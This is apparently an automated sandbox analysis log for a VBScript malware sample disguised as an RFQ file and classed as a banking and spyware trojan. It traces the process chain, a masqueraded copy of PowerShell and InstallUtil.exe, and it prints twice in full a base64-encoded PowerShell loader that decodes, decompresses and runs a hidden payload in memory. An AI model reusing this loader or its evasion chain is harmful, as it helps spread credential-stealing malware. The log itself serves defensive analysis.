Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D7D12	8_2_050D7D12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D7D88	8_2_050D7D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_050D3DA8	8_2_050D3DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_057918E8	8_2_057918E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_057918E3	8_2_057918E3

Source: RFQ_43200046412000086500125.vbs

Initial sample: Strings found which are bigger than 50

Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052FE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751552999.0000000000074000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2042987541.0000000009650000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFjpcdguigfd.dll" vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2041952584.0000000008BB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCpdmznj.exe0 vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2009662736.00000000032F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ_43200046412000086500125.vbs
Source: RFQ_43200046412000086500125.vbs.exe.1.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs RFQ_43200046412000086500125.vbs

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2266
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2266			Jump to behavior

Source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winVBS@8/5@3/2

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\5e7a81857a353068

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm5sfz2w.xtf.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs"

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000008.00000002.2063750110.00000000029C8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

File read: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
